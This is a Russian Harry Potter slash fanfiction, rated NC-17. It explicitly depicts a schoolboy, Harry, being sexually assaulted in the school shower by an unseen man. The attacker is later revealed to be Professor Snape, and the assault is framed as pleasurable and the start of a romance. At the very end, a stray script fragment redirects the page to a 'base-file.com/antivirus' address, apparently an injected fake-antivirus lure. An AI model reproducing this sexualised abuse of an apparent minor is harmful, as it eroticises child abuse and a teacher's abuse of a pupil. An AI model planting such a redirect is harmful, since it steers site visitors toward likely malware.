Человек-невидимка

Автор: Ungolianta
Беты: Franta, Kladbische
Гамма: Riana
Жанр: slash/roman/humor
Рейтинг: NC-17
Дисклеймер: герои принадлежат Роулинг, и мне они не нужны
Пейринг: ГП/СС
Саммари: чего только не случиться в тот момент, когда Мальчик-Который-Выжил находится в душе…

Гарри выключил воду в общественном душе, с наслаждением дождавшись, пока тёплые струи воды стекут с его тела, и вылез из круглой ванны. Что может быть прекраснее: растереть себя настоянным на травах очищающим зельем, которое любезно предоставил ученикам профессор Снейп; смазать всё ещё влажную кожу пахучим лавандовым маслом и оставить её сохнуть; чувствовать каждой клеточкой кожи, как оно впитывается, оставляя после себя невыветриваемый запах и приятную прохладу…

Баночка с маслом вырвалась из скользких рук и шлёпнулась в ванну с тихим хлопком. Хорошо хоть не разбилась – мальчику пришлось бы тогда долго отчитываться перед факультетами за убыток и резкий запах, который, должно быть, распространился бы по всей школе.

Оценив размер ущерба, Гарри потянулся за банкой, перегнувшись через холодный борт каменной ванны.

Что это? Поттер вздрогнул всем телом. Мозг оценил ужас происходящего лишь спустя пару секунд, но за этот промежуток времени Гарри успел окаменеть от ужаса.

Руки. Чьи-то руки нежно, осторожно, но довольно-таки крепко обхватили его худые бёдра.

Поттер не слышал, как к нему кто-то подкрался сзади; не мог и предположить, кто это и чего он хочет. Тело обдало мелкой дрожью.

Позади раздался лёгкий вздох.

Гарри предпринял было попытку разогнуться, но сильная рука мягко, но настойчиво легла ему на спину, всем своим действием недвусмысленно показывая, что подниматься не стоит.

Гарри мёртвой хваткой вцепился в борт ванной. Кажется, сейчас ему не поздоровится. Кто бы это мог быть? Что он собирается делать?

Впрочем, холодея от ужаса, Гарри начал понимать ответ на последний вопрос.

Рука нежно провела по спине Гарри, спустилась к его ягодицам, нежно сжимая их ногтями. Раздался шорох мантии – возня, показавшаяся Гарри шелестом листьев или чьих-то крыльев. Пальцы заскользили по его влажной коже, забираясь в самые потаённые места, словно бы ощупывая поле для предстоящей деятельности: осторожно, поглаживающими и массирующими движениями они продвигались к единственному доступному отверстию в теле мальчика. Видимо, то, что палец нащупал, загадочному существу за спиной понравилось, потому что руки с острыми коготками резко раздвинули ягодицы Гарри, и в его тело ворвался горячий инородный предмет.

Чужая плоть, наверное, разорвала бы Гарри на куски, если бы не спасительное лавандовое масло, послужившее смазкой; оно посодействовало тому, чтобы Гарри было не так больно – человек-невидимка явно не страдал комплексом неполноценности по поводу своего главного мужского достоинства.

Гарри вжался в борт ванной, подавив в себе желание вцепиться в него зубами. Уши и щёки горели от ощущения собственной беспомощности, унижения и какого-то неправильного, неестественного стыда.

Между тем человек-невидимка вогнал своё пульсирующее достояние как можно глубже, прижавшись лобком к филейной части Мальчика-который-всё-ещё-жив. Его руки продолжали бродить по телу Гарри, хищно сжимая его бёдра, бока, добираясь до довольно-таки накачанного животика. Гарри опустил глаза, пытаясь понять, что же это за руки и кому они принадлежат, но тут же закрыл глаза от ужаса: пальцы уже сжимали его яички, покрытые нежной бархатистой кожей. Гарри понял, что эрекции ему не миновать… Но будет ли это уместно в данной ситуации? Нельзя, ни в коем случае нельзя показывать извергу, что ему приятно.

А, между тем, как бы ни хотел он скрыть это от себя, Поттеру действительно было приятно. Его собственное богатство неминуемо росло в диаметре и поднималось по мере того, как чуткие пальцы двигались по нему вверх-вниз. Чужое тело наваливалось на Гарри, проникая всё глубже и глубже… Поттер чувствовал себя абсолютно беспомощным, и это было приятно. Он расслабился.

Руки ласкали его, двигаясь всё быстрее и быстрее. Сзади раздавалось тяжёлое дыхание, которое вскоре перешло в шипение – человек-невидимка явно пытался задушить собственные стоны. Гарри же даже и не собирался делать этого: забыв о безопасности, собственном позоре и правилах приличия, он стонал в полную силу, отдавая себя на растерзание этим искусным рукам и горячему напряжённому телу. Наконец он почувствовал лёгкий взрыв – горячая жидкость разлилась по его организму – и кончил сам, зажмурив глаза и вскрикивая от волн наступившего оргазма.

Человек-невидимка исчез так же неожиданно, как и появился.

Гарри долго боялся разогнуться или хотя бы открыть глаза – неизвестный в порыве страсти всё-таки чересчур сильно стиснул ногтями его бёдра, и теперь восемь маленьких царапин нещадно саднили.

Обессилевший Поттер опустился на холодный пол, потирая «боевые раны». Он был абсолютно мокрым от пота и взлохмаченным, и его всё ещё била дрожь от пришедшего несколько минут назад наслаждения.

Впору мыться заново: лавандовое масло сменилось потом, и, к тому же, тайный любовник почти полностью стёр его одеждой. Но лезть обратно в ванну Гарри не рискнул, да и сил совсем не осталось.

– Что случилось? – обеспокоено спросил Рон, когда Гарри появился в гостиной факультета. – Тебя не было… около часа! – сообщил он, бросив быстрый взгляд на песочные часы на камине.

– Я… – Гарри всё ещё не мог прийти в себя. – Я упал в обморок в ванной. Давление, наверное, подскочило – включил слишком горячую воду.

Он сел рядом с другом и впился глазами в его лицо.

Человек-невидимка… кто же это был? Явно не Рон: однокурсник просто не обладал таким большим богатством, которое несколько минут назад находилось между ягодиц Гарри. Впрочем, чем чёрт не шутит?

Но Уизли в отличие от самого Гарри выглядел абсолютно спокойным, разве что слегка волновался за друга. А сохранить после ТАКОГО хладнокровие ему бы вряд ли удалось. Да и ногти его были слишком коротки, чтобы оставить на чьей-то коже царапины.

Кто же тогда?

Гарри обвел взглядом гостиную Гриффиндора. Ребята были оживлены, но никто из них явно не находился только что в жаркой, распаренной ванной, пыхтя над однокурсником. Да и в мантиях не было почти никого… Хотя это ведь не показатель, мантию можно было и снять после прихода в гостиную.

Этой ночью Гарри не спалось.

Он вспоминал эти руки, эти пальцы, их мягкие и нежные прикосновения…. И, чёрт подери, ему это нравилось! Он очень хотел найти того человека… чтобы повторить?

Да, пожалуй…

Гарри вряд ли испытывал в жизни что-то более приятное, чем то, что с ним происходило этим вечером.

Однако этот человек может больше никак себя не проявить. Возможно, это была его мимолётная слабость? Он просто побоится сделать это во второй раз. А жаль… Возможно, он даже не и подозревает, какое наслаждение доставил Поттеру.

Произошедшее было настолько невероятным и необычным, что для Гарри уже не было удивительным или противоестественным подойти к этому человеку, если вдруг он объявится, и предложить ему если не руку и сердце, то хотя бы постоянное партнёрство.

«Простите, вы вчера меня поимели в ванной, и я хочу сказать вам большое спасибо. Отныне я всегда к вашим услугам».

От абсурдности и нелепости этой мысли Гарри не выдержал и расхохотался в полный голос.

Спальня неодобрительно загудела.

– Что такое? – раздался сонный голос Рона с соседней кровати.

– Ничего, сон приснился, – хрюкнул Гарри и постарался сдержать дальнейшие проявления эмоций.

Утром Гарри сидел в Большом зале, лениво ковыряя ложкой картофельное пюре, и осматривал факультетские столы. Кто же?..

Или…

Он перевёл взгляд на учительский стол.

Нет, не может быть.

Гарри махнул головой, будто так можно было отогнать безумную мысль.

В памяти вспыхнул образ: длинные пальцы, лежащие на его животе… О, драконий навоз! Эти пальцы принадлежали не подростку, определённо!

Круг подозреваемых стихийно сжимался. Мужчин в Хогвартсе было не так уж и много: преподаватели, Филч… Люциус Малфой, невесть каким образом оказавшийся в школе… Видимо, приехал в гости к сыночку, посмотреть, не обижает ли кто.

Гарри на всякий случай взглянул на его пальцы, изящно сжимающие бокал с каким-то напитком, и облегчённо вздохнул: слава Мерлину, это не он. Его ногти были слишком длинными – такие ободрали бы кожу мальчика гораздо сильнее.

Внезапно Гарри ощутил на себе чей-то пристальный взгляд и обомлел.

Прямо на него, впившись глазами-бусинками, и сжав губы в одну тонкую полоску, смотрел профессор Снейп. Перехватив взгляд мальчика, он быстро отвернулся и сделал вид, что полностью поглощён созерцанием гриффиндорского флага, но тщетно – Гарри уже всё понял. Мельком глянув на пальцы профессора, он с удовлетворением отметил, что именно ЭТИ пальцы доставляли ему такое удовольствие, нежно гладя его тело. Он узнал их.

Снейп уже понял, что раскрыт. Посмотрев мельком на Поттера, он сначала попытался, спрятать руки, выдающие его, под стол, но это было уже бесполезно, и он еле заметно улыбнулся Гарри.

Мальчик знал, что теперь всё будет иначе, чем раньше. Теперь он понял причину всех нападок профессора, его пристального внимания. И знал, что всё изменится. Его сердце радостно трепетало от осознания этой мысли и, вопреки всем его привычкам, он стал с нетерпением ждать урока зельеварения… 

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>